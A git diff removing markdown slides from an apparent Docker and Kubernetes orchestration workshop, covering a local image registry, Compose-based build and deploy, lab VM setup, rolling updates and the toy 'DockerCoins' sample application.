||||
- Services of the task are connected to this network
|
||||
<br/>(unless specified differently in the Compose file)
|
||||
|
||||
- Services get network aliases matching their name in the Compose file
|
||||
<br/>(just like when Compose brings up an app specified in a v2 file)
|
||||
|
||||
- Services are explicitly named `<stack_name>_<service_name>`
|
||||
|
||||
- Services and tasks also get an internal label indicating which stack they belong to
|
||||
|
||||
---
|
||||
|
||||
class: auto-btp
|
||||
|
||||
## Testing our local registry
|
||||
|
||||
- Connecting to port 5000 *on any node of the cluster* routes us to the registry
|
||||
|
||||
- Therefore, we can use `localhost:5000` or `127.0.0.1:5000` as our registry
|
||||
|
||||
.exercise[
|
||||
|
||||
- Issue the following API request to the registry:
|
||||
```bash
|
||||
curl 127.0.0.1:5000/v2/_catalog
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
It should return:
|
||||
|
||||
```json
|
||||
{"repositories":[]}
|
||||
```
|
||||
|
||||
If that doesn't work, retry a few times; perhaps the container is still starting.
|
||||
|
||||
---
|
||||
|
||||
class: auto-btp
|
||||
|
||||
## Pushing an image to our local registry
|
||||
|
||||
- We can retag a small image, and push it to the registry
|
||||
|
||||
.exercise[
|
||||
|
||||
- Make sure we have the busybox image, and retag it:
|
||||
```bash
|
||||
docker pull busybox
|
||||
docker tag busybox 127.0.0.1:5000/busybox
|
||||
```
|
||||
|
||||
- Push it:
|
||||
```bash
|
||||
docker push 127.0.0.1:5000/busybox
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: auto-btp
|
||||
|
||||
## Checking what's on our local registry
|
||||
|
||||
- The registry API has endpoints to query what's there
|
||||
|
||||
.exercise[
|
||||
|
||||
- Ensure that our busybox image is now in the local registry:
|
||||
```bash
|
||||
curl http://127.0.0.1:5000/v2/_catalog
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The curl command should now output:
|
||||
```json
|
||||
"repositories":["busybox"]}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Building and pushing stack services
|
||||
|
||||
- When using Compose file version 2 and above, you can specify *both* `build` and `image`
|
||||
|
||||
- When both keys are present:
|
||||
|
||||
- Compose does "business as usual" (uses `build`)
|
||||
|
||||
- but the resulting image is named as indicated by the `image` key
|
||||
<br/>
|
||||
(instead of `<projectname>_<servicename>:latest`)
|
||||
|
||||
- it can be pushed to a registry with `docker-compose push`
|
||||
|
||||
- Example:
|
||||
|
||||
```yaml
|
||||
webfront:
|
||||
build: www
|
||||
image: myregistry.company.net:5000/webfront
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Using Compose to build and push images
|
||||
|
||||
.exercise[
|
||||
|
||||
- Try it:
|
||||
```bash
|
||||
docker-compose -f dockercoins.yml build
|
||||
docker-compose -f dockercoins.yml push
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Let's have a look at the `dockercoins.yml` file while this is building and pushing.
|
||||
|
||||
---
|
||||
|
||||
```yaml
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
rng:
|
||||
build: dockercoins/rng
|
||||
image: ${REGISTRY-127.0.0.1:5000}/rng:${TAG-latest}
|
||||
deploy:
|
||||
mode: global
|
||||
...
|
||||
redis:
|
||||
image: redis
|
||||
...
|
||||
worker:
|
||||
build: dockercoins/worker
|
||||
image: ${REGISTRY-127.0.0.1:5000}/worker:${TAG-latest}
|
||||
...
|
||||
deploy:
|
||||
replicas: 10
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Deploying the application
|
||||
|
||||
- Now that the images are on the registry, we can deploy our application stack
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the application stack:
|
||||
```bash
|
||||
docker stack deploy dockercoins --compose-file dockercoins.yml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
We can now connect to any of our nodes on port 8000, and we will see the familiar hashing speed graph.
|
||||
|
||||
---
|
||||
|
||||
## Maintaining multiple environments
|
||||
|
||||
There are many ways to handle variations between environments.
|
||||
|
||||
- Compose loads `docker-compose.yml` and (if it exists) `docker-compose.override.yml`
|
||||
|
||||
- Compose can load alternate file(s) by setting the `-f` flag or the `COMPOSE_FILE` environment variable
|
||||
|
||||
- Compose files can *extend* other Compose files, selectively including services:
|
||||
|
||||
```yaml
|
||||
web:
|
||||
extends:
|
||||
file: common-services.yml
|
||||
service: webapp
|
||||
```
|
||||
|
||||
See [this documentation page](https://docs.docker.com/compose/extends/) for more details about these techniques.
|
||||
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Good to know ...
|
||||
|
||||
- Compose file version 3 adds the `deploy` section
|
||||
|
||||
- Further versions (3.1, ...) add more features (secrets, configs ...)
|
||||
|
||||
- You can re-run `docker stack deploy` to update a stack
|
||||
|
||||
- You can make manual changes with `docker service update` ...
|
||||
|
||||
- ... But they will be wiped out each time you `docker stack deploy`
|
||||
|
||||
(That's the intended behavior, when one thinks about it!)
|
||||
|
||||
- `extends` doesn't work with `docker stack deploy`
|
||||
|
||||
(But you can use `docker-compose config` to "flatten" your configuration)
|
||||
|
||||
---
|
||||
|
||||
## Summary
|
||||
|
||||
- We've seen how to set up a Swarm
|
||||
|
||||
- We've used it to host our own registry
|
||||
|
||||
- We've built our app container images
|
||||
|
||||
- We've used the registry to host those images
|
||||
|
||||
- We've deployed and scaled our application
|
||||
|
||||
- We've seen how to use Compose to streamline deployments
|
||||
|
||||
- Awesome job, team!
|
||||
@@ -1,169 +0,0 @@
|
||||
# Pre-requirements
|
||||
|
||||
- Computer with internet connection and a web browser
|
||||
|
||||
- For instructor-led workshops: an SSH client to connect to remote machines
|
||||
|
||||
- on Linux, OS X, FreeBSD... you are probably all set
|
||||
|
||||
- on Windows, get [putty](http://www.putty.org/),
|
||||
Microsoft [Win32 OpenSSH](https://github.com/PowerShell/Win32-OpenSSH/wiki/Install-Win32-OpenSSH),
|
||||
[Git BASH](https://git-for-windows.github.io/), or
|
||||
[MobaXterm](http://mobaxterm.mobatek.net/)
|
||||
|
||||
- A tiny little bit of Docker knowledge
|
||||
|
||||
(that's totally OK if you're not a Docker expert!)
|
||||
|
||||
---
|
||||
|
||||
class: in-person, extra-details
|
||||
|
||||
## Nice-to-haves
|
||||
|
||||
- [Mosh](https://mosh.org/) instead of SSH, if your internet connection tends to lose packets
|
||||
<br/>(available with `(apt|yum|brew) install mosh`; then connect with `mosh user@host`)
|
||||
|
||||
- [GitHub](https://github.com/join) account
|
||||
<br/>(if you want to fork the repo)
|
||||
|
||||
- [Gitter](https://gitter.im/) account
|
||||
<br/>(to join the conversation during the workshop)
|
||||
|
||||
- [Slack](https://community.docker.com/registrations/groups/4316) account
|
||||
<br/>(to join the conversation after the workshop)
|
||||
|
||||
- [Docker Hub](https://hub.docker.com) account
|
||||
<br/>(it's one way to distribute images on your cluster)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Extra details
|
||||
|
||||
- This slide should have a little magnifying glass in the top left corner
|
||||
|
||||
(If it doesn't, it's because CSS is hard — Jérôme is only a backend person, alas)
|
||||
|
||||
- Slides with that magnifying glass indicate slides providing extra details
|
||||
|
||||
- Feel free to skip them if you're in a hurry!
|
||||
|
||||
---
|
||||
|
||||
## Hands-on sections
|
||||
|
||||
- The whole workshop is hands-on
|
||||
|
||||
- We will see Docker and Kubernetes in action
|
||||
|
||||
- You are invited to reproduce all the demos
|
||||
|
||||
- All hands-on sections are clearly identified, like the gray rectangle below
|
||||
|
||||
.exercise[
|
||||
|
||||
- This is the stuff you're supposed to do!
|
||||
- Go to [container.training](http://container.training/) to view these slides
|
||||
- Join the [chat room](@@CHAT@@)
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: pic, in-person
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
class: in-person
|
||||
|
||||
## You get five VMs
|
||||
|
||||
- Each person gets 5 private VMs (not shared with anybody else)
|
||||
- Kubernetes has been deployed and pre-configured on these machines
|
||||
- They'll remain up until the day after the tutorial
|
||||
- You should have a little card with login+password+IP addresses
|
||||
- You can automatically SSH from one VM to another
|
||||
|
||||
.exercise[
|
||||
|
||||
<!--
|
||||
```bash
|
||||
for N in $(seq 1 5); do
|
||||
ssh -o StrictHostKeyChecking=no node$N true
|
||||
done
|
||||
for N in $(seq 1 5); do
|
||||
(.
|
||||
docker-machine rm -f node$N
|
||||
ssh node$N "docker ps -aq | xargs -r docker rm -f"
|
||||
ssh node$N sudo rm -f /etc/systemd/system/docker.service
|
||||
ssh node$N sudo systemctl daemon-reload
|
||||
echo Restarting node$N.
|
||||
ssh node$N sudo systemctl restart docker
|
||||
echo Restarted node$N.
|
||||
) &
|
||||
done
|
||||
wait
|
||||
```
|
||||
-->
|
||||
|
||||
- Log into the first VM (`node1`) with SSH or MOSH
|
||||
- Check that you can SSH (without password) to `node2`:
|
||||
```bash
|
||||
ssh node2
|
||||
```
|
||||
- Type `exit` or `^D` to come back to node1
|
||||
|
||||
<!--
|
||||
```meta
|
||||
^D
|
||||
```
|
||||
-->
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## We will (mostly) interact with node1 only
|
||||
|
||||
- Unless instructed, **all commands must be run from the first VM, `node1`**
|
||||
|
||||
- We will only checkout/copy the code on `node1`
|
||||
|
||||
- When we will use the other nodes, we will do it mostly through the Docker API
|
||||
|
||||
- We will log into other nodes only for initial setup and a few "out of band" operations
|
||||
<br/>(checking internal logs, debugging...)
|
||||
|
||||
---
|
||||
|
||||
## Terminals
|
||||
|
||||
Once in a while, the instructions will say:
|
||||
<br/>"Open a new terminal."
|
||||
|
||||
There are multiple ways to do this:
|
||||
|
||||
- create a new window or tab on your machine, and SSH into the VM;
|
||||
|
||||
- use screen or tmux on the VM and open a new window from there.
|
||||
|
||||
You are welcome to use the method that you feel the most comfortable with.
|
||||
|
||||
---
|
||||
|
||||
## Tmux cheatsheet
|
||||
|
||||
- Ctrl-b c → creates a new window
|
||||
- Ctrl-b n → go to next window
|
||||
- Ctrl-b p → go to previous window
|
||||
- Ctrl-b " → split window top/bottom
|
||||
- Ctrl-b % → split window left/right
|
||||
- Ctrl-b Alt-1 → rearrange windows in columns
|
||||
- Ctrl-b Alt-2 → rearrange windows in rows
|
||||
- Ctrl-b arrows → navigate to other windows
|
||||
- Ctrl-b d → detach session
|
||||
- tmux attach → reattach to session
|
||||
245
docs/prereqs.md
245
docs/prereqs.md
@@ -1,245 +0,0 @@
|
||||
# Pre-requirements
|
||||
|
||||
- Computer with internet connection and a web browser
|
||||
|
||||
- For instructor-led workshops: an SSH client to connect to remote machines
|
||||
|
||||
- on Linux, OS X, FreeBSD... you are probably all set
|
||||
|
||||
- on Windows, get [putty](http://www.putty.org/),
|
||||
Microsoft [Win32 OpenSSH](https://github.com/PowerShell/Win32-OpenSSH/wiki/Install-Win32-OpenSSH),
|
||||
[Git BASH](https://git-for-windows.github.io/), or
|
||||
[MobaXterm](http://mobaxterm.mobatek.net/)
|
||||
|
||||
- For self-paced learning: SSH is not necessary if you use
|
||||
[Play-With-Docker](http://www.play-with-docker.com/)
|
||||
|
||||
- Some Docker knowledge
|
||||
|
||||
(but that's OK if you're not a Docker expert!)
|
||||
|
||||
---
|
||||
|
||||
class: in-person, extra-details
|
||||
|
||||
## Nice-to-haves
|
||||
|
||||
- [Mosh](https://mosh.org/) instead of SSH, if your internet connection tends to lose packets
|
||||
<br/>(available with `(apt|yum|brew) install mosh`; then connect with `mosh user@host`)
|
||||
|
||||
- [GitHub](https://github.com/join) account
|
||||
<br/>(if you want to fork the repo)
|
||||
|
||||
- [Gitter](https://gitter.im/) account
|
||||
<br/>(to join the conversation during the workshop)
|
||||
|
||||
- [Slack](https://community.docker.com/registrations/groups/4316) account
|
||||
<br/>(to join the conversation after the workshop)
|
||||
|
||||
- [Docker Hub](https://hub.docker.com) account
|
||||
<br/>(it's one way to distribute images on your cluster)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Extra details
|
||||
|
||||
- This slide should have a little magnifying glass in the top left corner
|
||||
|
||||
(If it doesn't, it's because CSS is hard — Jérôme is only a backend person, alas)
|
||||
|
||||
- Slides with that magnifying glass indicate slides providing extra details
|
||||
|
||||
- Feel free to skip them if you're in a hurry!
|
||||
|
||||
---
|
||||
|
||||
## Hands-on sections
|
||||
|
||||
- The whole workshop is hands-on
|
||||
|
||||
- We will see Docker in action
|
||||
|
||||
- You are invited to reproduce all the demos
|
||||
|
||||
- All hands-on sections are clearly identified, like the gray rectangle below
|
||||
|
||||
.exercise[
|
||||
|
||||
- This is the stuff you're supposed to do!
|
||||
- Go to [container.training](http://container.training/) to view these slides
|
||||
- Join the [chat room](@@CHAT@@)
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: in-person
|
||||
|
||||
# VM environment
|
||||
|
||||
- To follow along, you need a cluster of five Docker Engines
|
||||
|
||||
- If you are doing this with an instructor, see next slide
|
||||
|
||||
- If you are doing (or re-doing) this on your own, you can:
|
||||
|
||||
- create your own cluster (local or cloud VMs) with Docker Machine
|
||||
([instructions](https://github.com/jpetazzo/orchestration-workshop/tree/master/prepare-machine))
|
||||
|
||||
- use [Play-With-Docker](http://play-with-docker.com) ([instructions](https://github.com/jpetazzo/orchestration-workshop#using-play-with-docker))
|
||||
|
||||
- create a bunch of clusters for you and your friends
|
||||
([instructions](https://github.com/jpetazzo/orchestration-workshop/tree/master/prepare-vms))
|
||||
|
||||
---
|
||||
|
||||
class: pic, in-person
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
class: in-person
|
||||
|
||||
## You get five VMs
|
||||
|
||||
- Each person gets 5 private VMs (not shared with anybody else)
|
||||
- They'll remain up until the day after the tutorial
|
||||
- You should have a little card with login+password+IP addresses
|
||||
- You can automatically SSH from one VM to another
|
||||
|
||||
.exercise[
|
||||
|
||||
<!--
|
||||
```bash
|
||||
for N in $(seq 1 5); do
|
||||
ssh -o StrictHostKeyChecking=no node$N true
|
||||
done
|
||||
for N in $(seq 1 5); do
|
||||
(.
|
||||
docker-machine rm -f node$N
|
||||
ssh node$N "docker ps -aq | xargs -r docker rm -f"
|
||||
ssh node$N sudo rm -f /etc/systemd/system/docker.service
|
||||
ssh node$N sudo systemctl daemon-reload
|
||||
echo Restarting node$N.
|
||||
ssh node$N sudo systemctl restart docker
|
||||
echo Restarted node$N.
|
||||
) &
|
||||
done
|
||||
wait
|
||||
```
|
||||
-->
|
||||
|
||||
- Log into the first VM (`node1`) with SSH or MOSH
|
||||
- Check that you can SSH (without password) to `node2`:
|
||||
```bash
|
||||
ssh node2
|
||||
```
|
||||
- Type `exit` or `^D` to come back to node1
|
||||
|
||||
<!--
|
||||
```meta
|
||||
^D
|
||||
```
|
||||
-->
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## If doing or re-doing the workshop on your own ...
|
||||
|
||||
- Use [Play-With-Docker](http://www.play-with-docker.com/)!
|
||||
|
||||
- Main differences:
|
||||
|
||||
- you don't need to SSH to the machines
|
||||
<br/>(just click on the node that you want to control in the left tab bar)
|
||||
|
||||
- Play-With-Docker automagically detects exposed ports
|
||||
<br/>(and displays them as little badges with port numbers, above the terminal)
|
||||
|
||||
- You can access HTTP services by clicking on the port numbers
|
||||
|
||||
- exposing TCP services requires something like
|
||||
[ngrok](https://ngrok.com/)
|
||||
or [supergrok](https://github.com/jpetazzo/orchestration-workshop#using-play-with-docker)
|
||||
|
||||
<!--
|
||||
|
||||
- If you use VMs deployed with Docker Machine:
|
||||
|
||||
- you won't have pre-authorized SSH keys to bounce across machines
|
||||
|
||||
- you won't have host aliases
|
||||
|
||||
-->
|
||||
|
||||
---
|
||||
|
||||
class: self-paced
|
||||
|
||||
## Using Play-With-Docker
|
||||
|
||||
- Open a new browser tab to [www.play-with-docker.com](http://www.play-with-docker.com/)
|
||||
|
||||
- Confirm that you're not a robot
|
||||
|
||||
- Click on "ADD NEW INSTANCE": congratulations, you have your first Docker node!
|
||||
|
||||
- When you will need more nodes, just click on "ADD NEW INSTANCE" again
|
||||
|
||||
- Note the countdown in the corner; when it expires, your instances are destroyed
|
||||
|
||||
- If you give your URL to somebody else, they can access your nodes too
|
||||
<br/>
|
||||
(You can use that for pair programming, or to get help from a mentor)
|
||||
|
||||
- Loving it? Not loving it? Tell it to the wonderful authors,
|
||||
[@marcosnils](https://twitter.com/marcosnils) &
|
||||
[@xetorthio](https://twitter.com/xetorthio)!
|
||||
|
||||
---
|
||||
|
||||
## We will (mostly) interact with node1 only
|
||||
|
||||
- Unless instructed, **all commands must be run from the first VM, `node1`**
|
||||
|
||||
- We will only checkout/copy the code on `node1`
|
||||
|
||||
- When we will use the other nodes, we will do it mostly through the Docker API
|
||||
|
||||
- We will log into other nodes only for initial setup and a few "out of band" operations
|
||||
<br/>(checking internal logs, debugging...)
|
||||
|
||||
---
|
||||
|
||||
## Terminals
|
||||
|
||||
Once in a while, the instructions will say:
|
||||
<br/>"Open a new terminal."
|
||||
|
||||
There are multiple ways to do this:
|
||||
|
||||
- create a new window or tab on your machine, and SSH into the VM;
|
||||
|
||||
- use screen or tmux on the VM and open a new window from there.
|
||||
|
||||
You are welcome to use the method that you feel the most comfortable with.
|
||||
|
||||
---
|
||||
|
||||
## Tmux cheatsheet
|
||||
|
||||
- Ctrl-b c → creates a new window
|
||||
- Ctrl-b n → go to next window
|
||||
- Ctrl-b p → go to previous window
|
||||
- Ctrl-b " → split window top/bottom
|
||||
- Ctrl-b % → split window left/right
|
||||
- Ctrl-b Alt-1 → rearrange windows in columns
|
||||
- Ctrl-b Alt-2 → rearrange windows in rows
|
||||
- Ctrl-b arrows → navigate to other windows
|
||||
- Ctrl-b d → detach session
|
||||
- tmux attach → reattach to session
|
||||
197
docs/rollout.md
197
docs/rollout.md
@@ -1,197 +0,0 @@
|
||||
# Rolling updates
|
||||
|
||||
- By default (without rolling updates), when a scaled resource is updated:
|
||||
|
||||
- new pods are created
|
||||
|
||||
- old pods are terminated
|
||||
|
||||
- ... all at the same time
|
||||
|
||||
- if something goes wrong, ¯\\\_(ツ)\_/¯
|
||||
|
||||
---
|
||||
|
||||
## Rolling updates
|
||||
|
||||
- With rolling updates, when a resource is updated, it happens progressively
|
||||
|
||||
- Two parameters determine the pace of the rollout: `maxUnavailable` and `maxSurge`
|
||||
|
||||
- They can be specified in absolute number of pods, or percentage of the `replicas` count
|
||||
|
||||
- At any given time ...
|
||||
|
||||
- there will always be at least `replicas`-`maxUnavailable` pods available
|
||||
|
||||
- there will never be more than `replicas`+`maxSurge` pods in total
|
||||
|
||||
- there will therefore be up to `maxUnavailable`+`maxSurge` pods being updated
|
||||
|
||||
- We have the possibility to rollback to the previous version
|
||||
<br/>(if the update fails or is unsatisfactory in any way)
|
||||
|
||||
---
|
||||
|
||||
## Rolling updates in practice
|
||||
|
||||
- As of Kubernetes 1.8, we can do rolling updates with:
|
||||
|
||||
`deployments`, `daemonsets`, `statefulsets`
|
||||
|
||||
- Editing one of these resources will automatically result in a rolling update
|
||||
|
||||
- Rolling updates can be monitored with the `kubectl rollout` subcommand
|
||||
|
||||
---
|
||||
|
||||
## Building a new version of the `worker` service
|
||||
|
||||
.exercise[
|
||||
|
||||
- Go to the `stack` directory:
|
||||
```bash
|
||||
cd ~/orchestration-workshop/stacks
|
||||
```
|
||||
|
||||
- Edit `dockercoins/worker/worker.py`, update the `sleep` line to sleep 1 second
|
||||
|
||||
- Build a new tag and push it to the registry:
|
||||
```bash
|
||||
export REGISTRY=localhost:3xxxx TAG=v0.2
|
||||
docker-compose -f dockercoins.yml build
|
||||
docker-compose -f dockercoins.yml push
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Rolling out the new version of the `worker` service
|
||||
|
||||
.exercise[
|
||||
|
||||
- Let's monitor what's going on by opening a few terminals, and run:
|
||||
```bash
|
||||
kubectl get pods -w
|
||||
kubectl get replicasets -w
|
||||
kubectl get deployments -w
|
||||
```
|
||||
|
||||
- Update `worker` either with `kubectl edit`, or by running:
|
||||
```bash
|
||||
kubectl set image deploy worker worker=$REGISTRY/worker:$TAG
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
That rollout should be pretty quick. What shows in the web UI?
|
||||
|
||||
---
|
||||
|
||||
## Rolling out a boo-boo
|
||||
|
||||
- What happens if we make a mistake?
|
||||
|
||||
.exercise[
|
||||
|
||||
- Update `worker` by specifying a non-existent image:
|
||||
```bash
|
||||
export TAG=v0.3
|
||||
kubectl set image deploy worker worker=$REGISTRY/worker:$TAG
|
||||
```
|
||||
|
||||
- Check what's going on:
|
||||
```bash
|
||||
kubectl rollout status deploy worker
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
Our rollout is stuck. However, the app is not dead (just 10% slower).
|
||||
|
||||
---
|
||||
|
||||
## Recovering from a bad rollout
|
||||
|
||||
- We could push some `v0.3` image
|
||||
|
||||
(the pod retry logic will eventually catch it and the rollout will proceed)
|
||||
|
||||
- Or we could invoke a manual rollback
|
||||
|
||||
.exercise[
|
||||
|
||||
- Cancel the deployment and wait for the dust to settle down:
|
||||
```bash
|
||||
kubectl rollout undo deploy worker
|
||||
kubectl rollout status deploy worker
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Changing rollout parameters
|
||||
|
||||
- We want to:
|
||||
|
||||
- revert to `v0.1`
|
||||
- be conservative on availability (always have desired number of available workers)
|
||||
- be aggressive on rollout speed (update more than one pod at a time)
|
||||
- give some time to our workers to "warm up" before starting more
|
||||
|
||||
The corresponding changes can be expressed in the following YAML snippet:
|
||||
|
||||
.small[
|
||||
```yaml
|
||||
spec:
|
||||
template:
|
||||
spec:
|
||||
containers:
|
||||
- name: worker
|
||||
image: $REGISTRY/worker:v0.1
|
||||
strategy:
|
||||
rollingUpdate:
|
||||
maxUnavailable: 0
|
||||
maxSurge: 3
|
||||
minReadySeconds: 10
|
||||
```
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Applying changes through a YAML patch
|
||||
|
||||
- We could use `kubectl edit deployment worker`
|
||||
|
||||
- But we could also use `kubectl patch` with the exact YAML shown before
|
||||
|
||||
.exercise[
|
||||
|
||||
.small[
|
||||
|
||||
- Apply all our changes and wait for them to take effect:
|
||||
```bash
|
||||
kubectl patch deployment worker -p "
|
||||
spec:
|
||||
template:
|
||||
spec:
|
||||
containers:
|
||||
- name: worker
|
||||
image: $REGISTRY/worker:v0.1
|
||||
strategy:
|
||||
rollingUpdate:
|
||||
maxUnavailable: 0
|
||||
maxSurge: 3
|
||||
minReadySeconds: 10
|
||||
"
|
||||
kubectl rollout status deployment worker
|
||||
```
|
||||
]
|
||||
|
||||
]
|
||||
@@ -1,468 +0,0 @@
|
||||
# Our sample application
|
||||
|
||||
- Visit the GitHub repository with all the materials of this workshop:
|
||||
<br/>https://github.com/jpetazzo/orchestration-workshop
|
||||
|
||||
- The application is in the [dockercoins](
|
||||
https://github.com/jpetazzo/orchestration-workshop/tree/master/dockercoins)
|
||||
subdirectory
|
||||
|
||||
- Let's look at the general layout of the source code:
|
||||
|
||||
there is a Compose file [docker-compose.yml](
|
||||
https://github.com/jpetazzo/orchestration-workshop/blob/master/dockercoins/docker-compose.yml) ...
|
||||
|
||||
... and 4 other services, each in its own directory:
|
||||
|
||||
- `rng` = web service generating random bytes
|
||||
- `hasher` = web service computing hash of POSTed data
|
||||
- `worker` = background process using `rng` and `hasher`
|
||||
- `webui` = web interface to watch progress
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Compose file format version
|
||||
|
||||
*Particularly relevant if you have used Compose before...*
|
||||
|
||||
- Compose 1.6 introduced support for a new Compose file format (aka "v2")
|
||||
|
||||
- Services are no longer at the top level, but under a `services` section
|
||||
|
||||
- There has to be a `version` key at the top level, with value `"2"` (as a string, not an integer)
|
||||
|
||||
- Containers are placed on a dedicated network, making links unnecessary
|
||||
|
||||
- There are other minor differences, but upgrade is easy and straightforward
|
||||
|
||||
---
|
||||
|
||||
## Links, naming, and service discovery
|
||||
|
||||
- Containers can have network aliases (resolvable through DNS)
|
||||
|
||||
- Compose file version 2+ makes each container reachable through its service name
|
||||
|
||||
- Compose file version 1 did require "links" sections
|
||||
|
||||
- Our code can connect to services using their short name
|
||||
|
||||
(instead of e.g. IP address or FQDN)
|
||||
|
||||
- Network aliases are automatically namespaced
|
||||
|
||||
(i.e. you can have multiple apps declaring and using a service named `database`)
|
||||
|
||||
---
|
||||
|
||||
## Example in `worker/worker.py`
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
## What's this application?
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
(DockerCoins 2016 logo courtesy of [@XtlCnslt](https://twitter.com/xtlcnslt) and [@ndeloof](https://twitter.com/ndeloof). Thanks!)
|
||||
|
||||
---
|
||||
|
||||
## What's this application?
|
||||
|
||||
- It is a DockerCoin miner! 💰🐳📦🚢
|
||||
|
||||
--
|
||||
|
||||
- No, you can't buy coffee with DockerCoins
|
||||
|
||||
--
|
||||
|
||||
- How DockerCoins works:
|
||||
|
||||
- `worker` asks to `rng` to generate a few random bytes
|
||||
|
||||
- `worker` feeds these bytes into `hasher`
|
||||
|
||||
- and repeat forever!
|
||||
|
||||
- every second, `worker` updates `redis` to indicate how many loops were done
|
||||
|
||||
- `webui` queries `redis`, and computes and exposes "hashing speed" in your browser
|
||||
|
||||
---
|
||||
|
||||
## Getting the application source code
|
||||
|
||||
- We will clone the GitHub repository
|
||||
|
||||
- The repository also contains scripts and tools that we will use through the workshop
|
||||
|
||||
.exercise[
|
||||
|
||||
<!--
|
||||
```bash
|
||||
[ -d orchestration-workshop ] && mv orchestration-workshop orchestration-workshop.$$
|
||||
```
|
||||
-->
|
||||
|
||||
- Clone the repository on `node1`:
|
||||
```bash
|
||||
git clone git://github.com/jpetazzo/orchestration-workshop
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
(You can also fork the repository on GitHub and clone your fork if you prefer that.)
|
||||
|
||||
---
|
||||
|
||||
# Running the application
|
||||
|
||||
Without further ado, let's start our application.
|
||||
|
||||
.exercise[
|
||||
|
||||
- Go to the `dockercoins` directory, in the cloned repo:
|
||||
```bash
|
||||
cd ~/orchestration-workshop/dockercoins
|
||||
```
|
||||
|
||||
- Use Compose to build and run all containers:
|
||||
```bash
|
||||
docker-compose up
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Compose tells Docker to build all container images (pulling
|
||||
the corresponding base images), then starts all containers,
|
||||
and displays aggregated logs.
|
||||
|
||||
---
|
||||
|
||||
## Lots of logs
|
||||
|
||||
- The application continuously generates logs
|
||||
|
||||
- We can see the `worker` service making requests to `rng` and `hasher`
|
||||
|
||||
- Let's put that in the background
|
||||
|
||||
.exercise[
|
||||
|
||||
- Stop the application by hitting `^C`
|
||||
|
||||
<!--
|
||||
```meta
|
||||
^C
|
||||
```
|
||||
-->
|
||||
|
||||
]
|
||||
|
||||
- `^C` stops all containers by sending them the `TERM` signal
|
||||
|
||||
- Some containers exit immediately, others take longer
|
||||
<br/>(because they don't handle `SIGTERM` and end up being killed after a 10s timeout)
|
||||
|
||||
---
|
||||
|
||||
## Restarting in the background
|
||||
|
||||
- Many flags and commands of Compose are modeled after those of `docker`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Start the app in the background with the `-d` option:
|
||||
```bash
|
||||
docker-compose up -d
|
||||
```
|
||||
|
||||
- Check that our app is running with the `ps` command:
|
||||
```bash
|
||||
docker-compose ps
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
`docker-compose ps` also shows the ports exposed by the application.
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Viewing logs
|
||||
|
||||
- The `docker-compose logs` command works like `docker logs`
|
||||
|
||||
.exercise[
|
||||
|
||||
- View all logs since container creation and exit when done:
|
||||
```bash
|
||||
docker-compose logs
|
||||
```
|
||||
|
||||
- Stream container logs, starting at the last 10 lines for each container:
|
||||
```bash
|
||||
docker-compose logs --tail 10 --follow
|
||||
```
|
||||
|
||||
<!--
|
||||
```meta
|
||||
^C
|
||||
```
|
||||
-->
|
||||
|
||||
]
|
||||
|
||||
Tip: use `^S` and `^Q` to pause/resume log output.
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Upgrading from Compose 1.6
|
||||
|
||||
.warning[The `logs` command has changed between Compose 1.6 and 1.7!]
|
||||
|
||||
- Up to 1.6
|
||||
|
||||
- `docker-compose logs` is the equivalent of `logs --follow`
|
||||
|
||||
- `docker-compose logs` must be restarted if containers are added
|
||||
|
||||
- Since 1.7
|
||||
|
||||
- `--follow` must be specified explicitly
|
||||
|
||||
- new containers are automatically picked up by `docker-compose logs`
|
||||
|
||||
---
|
||||
|
||||
## Connecting to the web UI
|
||||
|
||||
- The `webui` container exposes a web dashboard; let's view it
|
||||
|
||||
.exercise[
|
||||
|
||||
- With a web browser, connect to `node1` on port 8000
|
||||
|
||||
- Remember: the `nodeX` aliases are valid only on the nodes themselves
|
||||
|
||||
- In your browser, you need to enter the IP address of your node
|
||||
|
||||
]
|
||||
|
||||
You should see a speed of approximately 4 hashes/second.
|
||||
|
||||
More precisely: 4 hashes/second, with regular dips down to zero.
|
||||
<br/>This is because Jérôme is incapable of writing good frontend code.
|
||||
<br/>Don't ask. Seriously, don't ask. This is embarrassing.
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Why does the speed seem irregular?
|
||||
|
||||
- The app actually has a constant, steady speed: 3.33 hashes/second
|
||||
<br/>
|
||||
(which corresponds to 1 hash every 0.3 seconds, for *reasons*)
|
||||
|
||||
- The worker doesn't update the counter after every loop, but up to once per second
|
||||
|
||||
